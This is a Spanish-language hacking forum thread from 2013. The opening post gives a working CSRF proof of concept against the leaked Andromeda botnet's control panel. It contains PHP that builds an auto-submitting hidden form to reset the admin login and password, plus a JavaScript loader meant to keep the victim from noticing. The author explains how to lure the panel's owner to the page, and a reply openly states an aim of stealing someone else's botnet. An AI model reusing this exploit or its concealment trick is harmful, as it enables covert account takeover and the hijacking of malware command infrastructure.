Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Matabarras en Julio 27, 2013, 10:57:18 AM

Título: CSRF Andromeda Botnet [ POC Change Password]
Publicado por: Matabarras en Julio 27, 2013, 10:57:18 AM
Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: http://www.indetectables.net/viewtopic.php?p=395956&sid=13cf3c88fc9560dba5bb5e6ed93c4b9b) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..

Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.

Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..

Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.

Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.

Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.

Código [Seleccionar]
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('');
}

writeIf('http://127.0.0.1/csrf.php');

Simplemente, si tenemos nuestro csrf subido a nuestra web: ahfiuahfa.com , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.

Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
Código [Seleccionar]
<script src="a.js"></script>

Pues aqui el csrf,
Código [Seleccionar]
<?php

//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';

foreach($form As $key=>$value) {
 echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>

Una vez entren a la web que no se daran cuenta de nada gracias al JS.

Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.

Un saludo
Título: Re:CSRF Andromeda Botnet [ POC Change Password]
Publicado por: PW[N]ED en Julio 29, 2013, 09:19:31 PM
peeerdona pero no entendi nada :S , subi el csrf en .php , a mi web , y tengo un cpanel de un botnet andromeda que no es mio , es de otro loco que no se qien es , pero mi idea era robar esa andromeda bot , pero no se cmo tendrias skype , facebook o algo? gracias :)
Título: Re:CSRF Andromeda Botnet [ POC Change Password]
Publicado por: peruvianrulez en Julio 30, 2013, 07:46:47 PM
podrias ser mas especifico  o podes hacer un comentario en privado? ... gracias
Sólo texto | Texto con Imágenes